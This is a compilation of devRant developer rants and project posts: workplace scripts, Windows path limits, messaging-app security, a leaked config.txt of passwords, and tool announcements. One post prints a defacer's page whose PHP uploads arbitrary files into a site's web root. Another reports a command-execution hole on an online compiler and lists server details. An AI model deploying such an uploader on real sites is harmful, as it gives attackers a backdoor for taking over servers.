*Now that's what I call a Hacker*

MOTHER OF ALL AUTOMATIONS

This seems a long post. but you will definitely +1 the post after reading this.

xxx: OK, so, our build engineer has left for another company. The dude was literally living inside the terminal. You know, that type of a guy who loves Vim, creates diagrams in Dot and writes wiki-posts in Markdown... If something - anything - requires more than 90 seconds of his time, he writes a script to automate that.

xxx: So we're sitting here, looking through his, uhm, "legacy"

xxx: You're gonna love this

xxx: smack-my-bitch-up.sh - sends a text message "late at work" to his wife (apparently). Automatically picks reasons from an array of strings, randomly. Runs inside a cron-job. The job fires if there are active SSH-sessions on the server after 9pm with his login.

xxx: kumar-asshole.sh - scans the inbox for emails from "Kumar" (a DBA at our clients). Looks for keywords like "help", "trouble", "sorry" etc. If keywords are found - the script SSHes into the clients server and rolls back the staging database to the latest backup. Then sends a reply "no worries mate, be careful next time".

xxx: hangover.sh - another cron-job that is set to specific dates. Sends automated emails like "not feeling well/gonna work from home" etc. Adds a random "reason" from another predefined array of strings. Fires if there are no interactive sessions on the server at 8:45am.

xxx: (and the oscar goes to) fuckingcoffee.sh - this one waits exactly 17 seconds (!), then opens an SSH session to our coffee-machine (we had no frikin idea the coffee machine is on the network, runs linux and has SSHD up and running) and sends some weird gibberish to it. Looks binary. Turns out this thing starts brewing a mid-sized half-caf latte and waits another 24 (!) seconds before pouring it into a cup. The timing is exactly how long it takes to walk to the machine from the dudes desk.

xxx: holy sh*t I'm keeping those

Credit: http://bit.ly/1jcTuTT

The bash scripts weren't bogus, you can find his scripts on the this github URL:
https://github.com/narkoz/...

Hey everyone,

Merry Christmas to everyone who celebrates, happy holidays to everyone, and happy almost-new-year!

Tim and I wanted to reflect on the year devRant has had, and looking back, there are a lot of awesome things that happened in 2018 that we are very thankful for. Here are just a few of the ones that we thought of (this list is not exhaustive and I'm definitley forgetting stuff, so please comment about those!):

- After nearly a year in the making, the completely overhauled devRant web version was launched (https://devrant.com/rants/1255714/...)

- @linuxxx became the first devRant user to hit 100,000++! (https://devrant.com/rants/1157415/...)

- We once again pulled off the greatest April fools joke everrrr (https://devrant.com/rants/1311206/...)

- @trogus started making awesome devComics and http://devcomics.com was launched

- We added a feature to allow rant filtering by post type (https://devrant.com/rants/1354275/...)

- We made it so avatars could have expressions! (https://devrant.com/rants/1563683/...)

- We had a booth at TechDay New York and got to meet some devRant users! (https://devrant.com/rants/1394067/...)

- We made major backend architectural improvements - including spinning up a special high-powered-CPU web server to handle avatar creation and make the creation process much faster (https://devrant.com/rants/1370938/...)

- App stability: mainly Android - we fixed crashes, did a push-notif overhaul, and tried to continue making the apps better and more stable

- A record amount of devRant meetups were held, and we couldn't be more proud about that, and we thank every person who organized one! (just a few: https://devrant.com/rants/1588218/... https://devrant.com/rants/1884724/... https://devrant.com/rants/1683365/... https://devrant.com/rants/1922950/...)

We had a busy year, and despite some things going on for us personally and some setbacks around those, we think this was a very productve year for devRant and that we are going in the right direction. We're continuing to constantly evaluate feedback from members of the community to decide where to take the app next. We're fully committed to improving the devRant community in 2019 and we have a lot of ideas about how we can do that. We're working on some things, but we're not really announcing them yet, so please sit tight for those :) In the meantime, feel free to let us know what you'd like to see improved/added the most as we always like to get updated feedback from the community.

As always, thank you everyone, and thanks for your amazing contributions to the devRant community!

Looking forward to 2019,
- David and Tim

this.title = "gg Microsoft"
this.metadata = {
rant: true,
long: true,
super_long: true,
has_summary: true
}
// Also:
let microsoft = "dead" // please?

tl;dr: Windows' MAX_PATH is the devil, and it basically does not allow you to copy files with paths that exceed this length. No matter what. Even with official fixes and workarounds.

Long story:
So, I haven't had actual gainful employ in quite awhile. I've been earning just enough to get behind on bills and go without all but basic groceries. Because of this, our electronics have been ... in need of upgrading for quite awhile. In particular, we've needed new drives. (We've been down a server for two years now because its drive died!)

Anyway, I originally bought my external drive just for backup, but due to the above, I eventually began using it for everyday things. including Steam. over USB. Terrible, right? So, I decided to mount it as an internal drive to lower the read/write times. Finding SATA cables was difficult, the motherboard's SATA plugs are in a terrible spot, and my tiny case (and 2yo) made everything soo much worse. It was a miserable experience, but I finally got it installed.

However! It turns out the Seagate external drives use some custom drive header, or custom driver to access the drive, so Windows couldn't read the bare drive. ffs. So, I took it out again (joy) and put it back in the enclosure, and began copying the files off.

The drive I'm copying it to is smaller, so I enabled compression to allow storing a bit more of the data, and excluded a couple of directories so I could copy those elsewhere. I (barely) managed to fit everything with some pretty tight shuffling.

but. that external drive is connected via USB, remember? and for some reason, even over USB3, I was only getting ~20mb/s transfer rate, so the process took 20some hours! In the interim, I worked on some projects, watched netflix, etc., then locked my computer, and went to bed. (I also made sure to turn my monitors and keyboard light off so it wouldn't be enticing to my 2yo.) Cue dramatic music ~

Come morning, I go to check on the progress... and find that the computer is off! What the hell! I turn it on and check the logs... and found that it lost power around 9:16am. aslkjdfhaslkjashdasfjhasd. My 2yo had apparently been playing with the power strip and its enticing glowing red on/off switch. So. It didn't finish copying.

aslkjdfhaslkjashdasfjhasd x2

Anyway, finding the missing files was easy, but what about any that didn't finish? Filesizes don't match, so writing a script to check doesn't work. and using a visual utility like windirstat won't work either because of the excluded folders. Friggin' hell.

Also -- and rather the point of this rant:

It turns out that some of the files (70 in total, as I eventually found out) have paths exceeding Windows' MAX_PATH length (260 chars). So I couldn't copy those.

After some research, I learned that there's a Microsoft hotfix that patches this specific issue! for my specific version! woo! It's like. totally perfect. So, I installed that, restarted as per its wishes... tried again (via both drag and `copy`)... and Lo! It did not work.

After installing the hotfix. to fix this specific issue. on my specific os. the issue remained. gg Microsoft?

Further research.

I then learned (well, learned more about) the unicode path prefix `\\?\`, which bypasses Windows kernel's path parsing, and passes the path directly to ntfslib, thereby indirectly allowing ~32k path lengths. I tried this with the native `copy` command; no luck. I tried this with `robocopy` and cygwin's `cp`; they likewise failed. I tried it with cygwin's `rsync`, but it sees `\\?\` as denoting a remote path, and therefore fails.

However, `dir \\?\C:\` works just fine?

So, apparently, Microsoft's own workaround for long pathnames doesn't work with its own utilities. unless the paths are shorter than MAX_PATH? gg Microsoft.

At this point, I was sorely tempted to write my own copy utility that calls the internal Windows APIs that support unicode paths. but as I lack a C compiler, and haven't coded in C in like 15 years, I figured I'd try a few last desperate ideas first.

For the hell of it, I tried making an archive of the offending files with winRAR. Unsurprisingly, it failed to access the files.

... and for completeness's sake -- mostly to say I tried it -- I did the same with 7zip. I took one of the offending files and made a 7z archive of it in the destination folder -- and, much to my surprise, it worked perfectly! I could even extract the file! Hell, I could even work with paths >340 characters!

So... I'm going through all of the 70 missing files and copying them. with 7zip. because it's the only bloody thing that works. ffs

Third-party utilities work better than Microsoft's official fixes. gg.

...
On a related note, I totally feel like that person from http://xkcd.com/763 right now ;;

So today (or a day ago or whatever), Pavel Durov attacked Signal by saying that he wouldn't be surprised if a backdoor would be discovered in Signal because it's partially funded by the US government (or, some part of the us govt).

Let's break down why this is utter bullshit.

First, he wouldn't be surprised if a backdoor would be discovered 'within 5 years from now'.

- Teeny tiny little detail: THE FUCKING APP IS OPEN SOURCE. So yeah sure, go look through the code! Good idea! You might actually learn something from it as your own crypto seems to be broken! (for the record, I never said anything about telegram not being open source as it is)

sources:
http://cryptofails.com/post/...
http://theregister.co.uk/2015/11/...
https://security.stackexchange.com/...

- The server side code is closed (of signal and telegram both). Well, if your app is open source, enrolled with one of the strongest cryptographic protocols in the world and has been audited, then even if the server gets compromised, the hackers are still nowhere.

- Metadata. Signal saves the following and ONLY the following: timestamp of registration, timestamp of the last connection with the server (both rounded to the day so not on the second), your phone number and your contact details (if you authorize it) (only phone numbers) in HASHED (BCrypt I thought?) format.
There have been multiple telegram metadata leaks and it's pretty known that it saves way more than neccesary.

So, before you start judging an app which is open, uses one of the best crypto protocols in the world while you use your own homegrown horribly insecure protocol AND actually tries its best to save the least possible, maybe try to fix your own shit!

*gets ready for heavy criticism*

Worst thing you've seen another dev do? So many things. Here is one...

Lead web developer had in the root of their web application config.txt (ex. http://OurPublicSite/config.txt) that contained passwords because they felt the web.config was not secure enough. Any/all applications off of the root could access the file to retrieve their credentials (sql server logins, network share passwords, etc)

When I pointed out the security flaw, the developer accused me of 'hacking' the site.

I get called into the vice-president's office which he was 'deeply concerned' about my ethical behavior and if we needed to make any personnel adjustments (grown-up speak for "Do I need to fire you over this?")

Me:"I didn't hack anything. You can navigate directly to the text file using any browser."
Dev: "Directory browsing is denied on the root folder, so you hacked something to get there."
Me: "No, I knew the name of the file so I was able to access it just like any other file."
Dev: "That is only because you have admin permissions. Normal people wouldn't have access"
Me: "I could access it from my home computer"
Dev:"BECAUSE YOU HAVE ADMIN PERMISSIONS!"
Me: "On my personal laptop where I never had to login?"
VP: "What? You mean ...no....please tell me I heard that wrong."
Dev: "No..no...its secure....no one can access that file."
<click..click>
VP: "Hmmm...I can see the system administration password right here. This is unacceptable."
Dev: "Only because your an admin too."
VP: "I'll head home over lunch and try this out on my laptop...oh wait...I left it on...I can remote into it from here"
<click..click..click..click>
VP: "OMG...there it is. That account has access to everything."
<in an almost panic>
Dev: "Only because it's you...you are an admin...that's what I'm trying to say."
Me: "That is not how our public web site works."
VP: "Thank you, but Adam and I need to discuss the next course of action. You two may go."
<Adam is her boss>

Not even 5 minutes later a company wide email was sent from Adam..

"I would like to thank <Dev> for finding and fixing the security flaw that was exposed on our site. She did a great job in securing our customer data and a great asset to our team. If you see <Dev> in the hallway, be sure to give her a big thank you!"

The "fix"? She moved the text file from the root to the bin directory, where technically, the file was no longer publicly visible.

That 'pattern' was used heavily until she was promoted to upper management and the younger webdev bucks (and does) felt storing admin-level passwords was unethical and found more secure ways to authenticate.

Okay, story time.

Back during 2016, I decided to do a little experiment to test the viability of multithreading in a JavaScript server stack, and I'm not talking about the Node.js way of queuing I/O on background threads, or about WebWorkers that box and convert your arguments to JSON and back during a simple call across two JS contexts.

I'm talking about JavaScript code running concurrently on all cores. I'm talking about replacing the god-awful single-threaded event loop of ECMAScript – the biggest bottleneck in software history – with an honest-to-god, lock-free thread-pool scheduler that executes JS code in parallel, on all cores.

I'm talking about concurrent access to shared mutable state – a big, rightfully-hated mess when done badly – in JavaScript.

This rant is about the many mistakes I made at the time, specifically the biggest – but not the first – of which: publishing some preliminary results very early on.

Every time I showed my work to a JavaScript developer, I'd get negative feedback. Like, unjustified hatred and immediate denial, or outright rejection of the entire concept. Some were even adamantly trying to discourage me from this project.

So I posted a sarcastic question to the Software Engineering Stack Exchange, which was originally worded differently to reflect my frustration, but was later edited by mods to be more serious.

You can see the responses for yourself here: https://goo.gl/poHKpK

Most of the serious answers were along the lines of "multithreading is hard". The top voted response started with this statement: "1) Multithreading is extremely hard, and unfortunately the way you've presented this idea so far implies you're severely underestimating how hard it is."

While I'll admit that my presentation was initially lacking, I later made an entire page to explain the synchronisation mechanism in place, and you can read more about it here, if you're interested:

http://nexusjs.com/architecture/

But what really shocked me was that I had never understood the mindset that all the naysayers adopted until I read that response.

Because the bottom-line of that entire response is an argument: an argument against change.

The average JavaScript developer doesn't want a multithreaded server platform for JavaScript because it means a change of the status quo.

And this is exactly why I started this project. I wanted a highly performant JavaScript platform for servers that's more suitable for real-time applications like transcoding, video streaming, and machine learning.

Nexus does not and will not hold your hand. It will not repeat Node's mistakes and give you nice ways to shoot yourself in the foot later, like `process.on('uncaughtException', ...)` for a catch-all global error handling solution.

No, an uncaught exception will be dealt with like any other self-respecting language: by not ignoring the problem and pretending it doesn't exist. If you write bad code, your program will crash, and you can't rectify a bug in your code by ignoring its presence entirely and using duct tape to scrape something together.

Back on the topic of multithreading, though. Multithreading is known to be hard, that's true. But how do you deal with a difficult solution? You simplify it and break it down, not just disregard it completely; because multithreading has its great advantages, too.

Like, how about we talk performance?

How about distributed algorithms that don't waste 40% of their computing power on agent communication and pointless overhead (like the serialisation/deserialisation of messages across the execution boundary for every single call)?

How about vertical scaling without forking the entire address space (and thus multiplying your application's memory consumption by the number of cores you wish to use)?

How about utilising logical CPUs to the fullest extent, and allowing them to execute JavaScript? Something that isn't even possible with the current model implemented by Node?

Some will say that the performance gains aren't worth the risk. That the possibility of race conditions and deadlocks aren't worth it.

That's the point of cooperative multithreading. It is a way to smartly work around these issues.

If you use promises, they will execute in parallel, to the best of the scheduler's abilities, and if you chain them then they will run consecutively as planned according to their dependency graph.

If your code doesn't access global variables or shared closure variables, or your promises only deal with their provided inputs without side-effects, then no contention will *ever* occur.

If you only read and never modify globals, no contention will ever occur.

Are you seeing the same trend I'm seeing?

Good JavaScript programming practices miraculously coincide with the best practices of thread-safety.

When someone says we shouldn't use multithreading because it's hard, do you know what I like to say to that?

"To multithread, you need a pair."

You know what really pisses me off about the dev community is the circle jerk that ensues when someone bashes something they have no experience in. Take yesterday's React bash on Reddit and DevRant. Thomas Fuchs compared React and JSX to the intermingling of HTML CSS and JS of 15 years ago. If you knew anything about React or spent 1 hour learning what it's about you would immediately know why that isn't true but no, a giant circle jerk ensued comparing it to PHP! I'm sorry but HOW can you compare a pure JS view library that is renderable by the browser, to a full fledged server side language?? Not to mention the React approach uses a completely different programming paradigm of functional programming.

When I first saw React and Redux I realized what this is all really about, a shift in the paradigms of programming. React + Redux is the first time that functional programming has entered mainstream. We've had functional programming available to us via Haskell and more recently Clojure for a while now but it was never very obvious how powerful functional programming could be outside of the niche that used it for more analytical type tools. Now we have things like hot reloading (https://youtube.com/watch/...) and state playback (https://youtube.com/watch/... skip to ~3min to watch the magic) thanks to immutable state.

Before you decide that React is just another flavor of the month library I encourage you to learn about the advantages that functional programming provides (https://medium.com/@cscalfani/...) and checkout Elm (http://elm-lang.org/) as well. The nice thing about React + Redux is that it gives us a way to start programming functionally, without having to learn ML style syntax like Elm and ClojureScript. Keep in mind, when Object Oriented Programming was becoming popular it was widely controversial as well and look at all it has done for us.

I have finally launched my own mirror. I would really appreciate if you guys that use Raspbian could start using my mirror so I can see if shit works :)
More distros are underway!

deb http://mirror.linux.pizza/raspbian/ jessie main contrib non-free rpi
deb-src http://mirror.linux.pizza/raspbian/ jessie main contrib non-free rpi

Server is hosted in southern Sweden

So I've been developing something I call P.A.R.N! (terrible name, I know) that recursively scans a folder for images and serves up a picture gallery via http using those images.

What do you all think?
https://github.com/AdamWelch1/...

I just wanted to share my latest personal project here 😶

The funnest part for me was writing the web server part :P

My favorite OpenSource project is Julia (www.julialang.org). As a physicist, I could never really befriend myself with OOP. With Julia I can write beautiful Code, which I also understand (with full UTF-8 support).

In Python you write pseudo code in Julia you write math.

In Addition, there is an optional package on Github for every fuck which can be handled by the integrated package manager (like using QML, Distributions, Databases, HTTP Server, and so on...)

I once saw a YouTube video when youtube first started of this kid. He was a proud "hacker" and had this short video teaching everyone exactly how to hack Google.

He goes to the the terminal and types "ping http://google.com"

As the server responds, he tells everyone that was exactly how anyone can go and hack Google.

Clearly he was wrong, but he felt like more of a black hat than any of us ever will.

"There's more to it"
This is something that has been bugging me for a long time now, so <rant>.

Yesterday in one of my chats in Telegram I had a question from someone wanting to make their laptop completely bulletproof privacy respecting, yada yada.. down to the MAC address being randomized. Now I am a networking guy.. or at least I like to think I am.

So I told him, routers must block any MAC addresses from leaking out. So the MAC address is only relevant inside of the network you're in. IPv6 changes this and there is network discovery involved with fandroids and cryphones where WiFi remains turned on as you leave the house (price of convenience amirite?) - but I'll get back to that later.

Now for a laptop MAC address randomization isn't exactly relevant yet I'd say.. at least in something other than Windows where your privacy is right out the window anyway. MAC randomization while Nadella does the whole assfuck, sign me up! /s

So let's assume Linux. No MAC randomization, not necessary, privacy respecting nonetheless. MAC addresses do not leak outside of the network in traditional IPv4 networking. So what would you be worried about inside the network? A hacker inside Starbucks? This is the question I asked him, and argued that if you don't trust the network (and with a public hotspot I personally don't) you shouldn't connect to it in the first place. And since I recall MAC randomization being discussed on the ISC's dhcp-users mailing list a few months ago (http://isc-dhcp-users.2343191.n4.nabble.com/...), I linked that in as well. These are the hardcore networking guys, on the forum of one of the granddaddies of the internet. They make BIND which pretty much everyone uses. It's the de facto standard DNS server out there.

The reply to all of this was simply to the "don't connect to it if you don't trust it" - I guess that's all the privacy nut could argue with. And here we get to the topic of this rant. The almighty rebuttal "there's more to it than that!1! HTTPS doesn't require trust anymore!1!"

... An encrypted connection to a website meaning that you could connect to just about any hostile network. Are you fucking retarded? Ever heard of SSL stripping? Yeah HSTS solves that but only a handful of websites use it and it doesn't scale up properly, since it's pretty much a hardcoded list in web browsers. And you know what? Yes "there's more to it"! There's more to networking than just web browsing. There's 65 THOUSAND ports available on both TCP and UDP, and there you go narrow your understanding of networking to just 2 of them - 80 and 443. Yes there's a lot more to it. But not exactly the kind of thing you're arguing about.

Enjoy your cheap-ass Xiaomeme phone where the "phone" part means phoning home to China, and raging about the Google apps on there. Then try to solve problems that aren't actually problems and pretty vital network components, just because it's an identifier.

</rant>

P.S. I do care a lot about privacy. My web and mail servers for example do not know where my visitors are coming from. All they see is some reverse proxies that they think is the whole internet. So yes I care about my own and others' privacy. But you know.. I'm old-fashioned. I like to solve problems with actual solutions.

Has been a long time since I'm appreciating working with GRPC.

Amazingly fast and full-featured protocol! No complaints at all.

Although I felt something was missing...
​

Back in the days of HTTP, we were all given very simple tools for making requests to verify behaviours and data of any of our HTTP endpoints, tools like curl, postman, wget and so on...

This toolset gives us definitely a nice and quick way to explore our HTTP services, debug them when necessary and be efficient.
​

This is probably what I miss the most from HTTP.
​

When you want to debug a remote endpoint with GRPC, you need to actually write a client by hand (in any of the supported language) then run it.
​

There are alternatives in the open source world, but those wants you to either configure the server to support Reflection or add a proxy in front of your services to be able to query them in a simpler way.
​

This is not how things work in 2018 almost 2019.
​

We want simple, quick and efficient tools that make our life easier and having problems more under control.
​

I'm a developer my self and I feel this on my skin every day. I don't want to change my server or add an infrastructure component for the simple reason of being able to query it in a simpler way!

However, This exact problem has been solved many times from HTTP or other protocols, so we should do something about our beloved GRPC.
​

Fine! I've told to my self. Let's fix this.
​

A few weeks later...

I'm glad to announce the first Release of BloomRPC - The first GRPC Client GUI that is nice and simple,

It allows to query and explore your GRPC services with just a couple of clicks without any additional modification to what you have running right now! Just install the client and start making requests.
​

It has been built with the Electron technology so its a desktop app and it supports the 3 major platforms, Mac, Linux, Windows.
​

Check out the repository on GitHub: https://github.com/uw-labs/bloomrpc

This is the first step towards the goal of having a simple and efficient way of querying GRPC services!
​

Keep in mind that It is in its first release, so improvements will follow along with future releases.

Your feedback and contributions are very welcome.

If you have the same frustration with GRPC I hope BloomRPC will make you a bit happier!

Dear fellow developers: Let's talk about the Internet. If you're reading this post, you've probably heard of it and are comfortable using it on a regular basis. You may even develop software that works over the internet, and that's fine and great! But you have to draw the line somewhere, and that line has been pushed farther and farther back as time goes on.

Let's talk about video games. The first game that really got me into FPSes was Team Fortress 2. Back in the day, it had a great community of casual and competitive groups alike, and there were hats! Underneath the hood was a massive number of servers. Some were officially hosted, some were run by independent communities. It had a built-in browser and central index where you could find every publically-available server and connect to it. You could even manually input connection details if that failed. In my opinion, this was a near-perfect combination of optimal user-experience and maximum freedom to run whatever the hell you wanted to. Even today, if Valve decided to stop hosting official servers, the smaller communities could still stay afloat. Fifteen years in the future, after all demand has died off, someone can still recover the server software and play a game with their kids.

Now, contrast that to a game like Overwatch. Also a very pivotal game in the FPS world, and much more modern, but what's the underlying difference in implementation? NO SUPPORT FOR SELF-HOSTED SERVERS. What does that mean when Blizzard decides to stop hosting its central servers? IT DIES. There will be no more multiplayer experience, not now, not ever. You will never be able to fully share this part of your history with future generations.

Another great example is the evolution of voice chat software. While I will agree that Discord revolutionized the market, it took away our freedom to run our own server on our own hardware. I used to run a Mumble server, now it has fallen out of use and I miss it so much.

Over time, client software has become more and more dependent on centrally-hosted services. Not many people will think about how this will impact the future usability of the product, and this will kill our code when it becomes legacy and the company decides to stop supporting it. We will have nothing to give to future generations; nobody will be able to run it in an emulator and fully re-experience it like we can do with older games and software.

This is one of the worst regressions of our time. Think about services like IRC, SMTP, SSH, even HTTP, how you're so easily able to connect to any server running those protocols and how the Internet would change if those were replaced with proprietary software that depended on a central service.

(Relevant talk (16:42): https://youtu.be/_e6BKJPnb5o?t=1002)

FYI if you have ES file explorer get rid of it cause it has a major vuln that lets other extract files from your phone
https://xda-developers.com/es-file-...
There are many better alternatives, i personally use FX.
…
...
...WHY TF DOES A FILE EXPLORER RUN AN HTTP SERVER IN BACKGROUND ?!

Just started using the Dropbox API. Want to do a simple directory listing of my files. Sends HTTP GET request at https://api.dropboxapi.com/2/files/....

"Error in call to API function "files/list_folder": Your request's HTTP request method is "GET". This function only accepts the HTTP request method "POST"."

What. The. Fuck. Dropbox.

HTTP POST is for creating a new instance of a resource. HTTP GET is for reading. GET guarantees server state is not changed while POST does not. I want to fucking list a directory, not put stuff in it.

oh, I have a few mini-projects I'm proud of. Most of them are just handy utilities easing my BAU Dev/PerfEng/Ops life.

- bthread - multithreading for bash scripts: https://gitlab.com/netikras/bthread
- /dev/rant - a devRant client/device for Linux: https://gitlab.com/netikras/...
- JDBCUtil - a command-line utility to connect to any DB and run arbitrary queries using a JDBC driver: https://gitlab.com/netikras/...
- KubiCon - KuberneterInContainer - does what it says: runs kubernetes inside a container. Makes it super simple to define and extend k8s clusters in simple Dockerfiles: https://gitlab.com/netikras/KubICon
- ws2http - a stateful proxy server simplifying testing websockets - allows you to communicate with websockets using simple HTTP (think: curl, postman or even netcat (nc)): https://gitlab.com/netikras/ws2http

wk66 {
Don’t pay as much for things that aren’t as important.
}

tl;dr {Mobo won’t POST.};

Backstory:
Me and @Rekonnect built a website a few years ago. So I built a “server” and ran server 2008 on it. Our server was very budget oriented and featured the following:

AMD Athlon X4 860K
Biostar Hi-Fi A70U3P
8GB G.Skill Ripjaws series
Small HDD
R5 220 Core Edition
EVGA 430W
ODD

Over the years, I’ve made many changes. Now it’s a GTX 960 with 3 Small SSDs and one large HDD. No internal optical. PSU is now at 600W from EVGA. Also a really old Sound Blaster sound card just for the fun of it. The case is now a Corsair SPEC-01. Put a T92 CPU cooler and 3 Riing RGB case fans and you’re ready to go. I was getting ready to put a third monitor but haven’t gotten to it.

If you’ve been following my rants recently, you would’ve seen that I was interested in developing iOS apps. Thanks to the team at http://AMD-OSX.com and four days of work, I’ve installed macOS on one of the SSDs. I think.

The computer won’t POST.
I’ve tried everything and nothing seems to work. Well, there goes my hopes and dreams. Let’s hope I can borrow money from my parents to at least replace my motherboard. :(

Ideas/Help?

FYI: I at one point did get 4 beeps in post, the system decided to upgrade firmware, and the BIOS people are American Megatrends.

Anything will be appreciated.

I made a bit of a tradition of building a list of hardware that's superior to whatever Crapple is releasing whenever Crapple releases something - and for the first time, I decided to make it public instead of just sharing it with some coworkers.

Making it public however took some time (luckily, yesterday was a holiday here, so I got it done now) - at least, making it looking "not like shit" took some time.

So enjoy my (very basic) bootstrap templated, yet possibly useful list of builds superior to the Crapple Rag Mini (which is a completely fictional entity not resembling any existing company in the world. Promise. Totally. Penguin's swear.)

The list can be found here - expect to see an update anytime Crapple pushes new shit to the market:

http://il-pinguino.com/superiortocr...
(possibly not safe for work, children, catholics and SJWs). Yeah, no SSL cert, currently. Hell, it's a private server, it doesn't process any of your info and it doesn't offer downloads... I might add one in the future.

I hope you can forgive my shameless self-promotion, it's not a commercial site, there are no ads/shitcoin miners on it and i don't get a share/cut/whatever - just a small humorous joke project. For now.

BTW: I didn't attempt to build any of those. It should work, but please don't sue me if it doesn't.

After hours of development, updated code on server, closed ide, out of habbit oppened browser, went to http://localhost/, just to check how api is responding... No response. Restarted server. No response. 30 minutes of random tests/checks, no result at all. 30 nervous minutes later, realized that server was working fine... it's just me who freaking tried to access it via localhost. ffs 0_0

http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-position:right top;
background-repeat:no-repeat;
background-size:110%
}

.style1 {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
</style><br><br><br>

<br>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://&quot;.$_SERVER[&#039;HTTP_HOST&#039;].&quot;/";
echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
} else {
echo "gagal upload >:(";
}
}
}
?>

<!DOCTYPE html>
<html>
<title>K.I.T.A</title>

<audio autoplay loop>
<source src="http://micro.byethost24.com/KITA.mp..."></source>
</audio>
<head>
<link href='https://fonts.googleapis.com/css/...' rel='stylesheet' type='text/css'>
</head>
<body bgcolor="#2b2b2b" link="gray" text="gray">
<center>

<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;

this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<br><br><br>
<div id="satu">

<embed src="https://youtube.com/v/tec_KllmOH4/...

<br>
<b style="font-size: 40px;">hacked by T3RR0R B@B@</b>
<br>
- use your brain to repair this system<br>
Scary Crazy Forbidden<br>
@2018<br><br>
Contact : fb.com/mr.T3RR0R
<br></div>

Filling out IRS forms using the Brave browser in privacy mode:
---------
Access Denied
You don't have permission to access "http://sa.www4.irs.gov/modiein/...?" on this server.
Reference #18.cfc3117.1714401007.25a9c99f

https://errors.edgesuite.net/18.cfc...
---------
Filling it out using ridiculously non-secure regular Chrome browser which exposes bookmarks, history, and cookies to anyone with enough knowledge:

"Right this way, sir. Don't worry, your data is in safe hands. We're totally not mining your data for leverage against you for your political leanings in a future tax audit."

Made my own "devRant" ("inspired hehe") Android app/socialmedia^^

(still in BETA) Not targeting a specific area though. http://stardash.de:4000/

And no not a devRant replacement cuzz its not soo much dev Related :)

Layout has no similarities aT aLl :D

App can only be downloaded on my website cuzz im not 18 yet so i cant publish to the playstore (and also i kinda dislike Google and using anything Google connected in a app e.g. Firebase)

There is a build in update center in the app though.

Server:

My Pc (Linux)
Nodejs with Express
Mysql

App:

Android Studio mostly with Retrofit

Discovered this dumb backdoor into http://tutorialspoint.com/codinggro... months ago (June 2019). It's in Project>Compilation Options

It lets you execute any command on their server. I found a lot out:

The system is Red Hat based (Fedora/CentOS/RHEL)
It uses Linux kernel 3.20
It has 251GB of RAM
It has an 800GB HDD
Its IP is 172.17.0.2
Its main username is cg
It uses systemd init

Hey Guys
Today I'm bringing a tool for you guys, mount servers with old phones Or have servers in your phone for testing.
Tool: Servers Ultimate Pro
Web:: https://icecoldapps.com/app/...

Note1.: Doesn't handle well above android 6+, So test one of the free servers you're intending to use before buying.

Note2.: This App costs around 10€/$ but you can get single App servers for free (I think even html + php + mysql package for free).

Not promotional, I'm just a user that loves this App.
I already talked about this a few times (usually I just call the cell phone I'm using my web server), but as a noob I don't even knot the possibilities.

This App comes with more then 70 protocols (60+ servers and a mix of servers).
From ssh, ftp, html (nginx, lightppd, Apache, simple) with php and mysql, Webdav...

<quote>

Run over 60 servers with over 70 protocols!

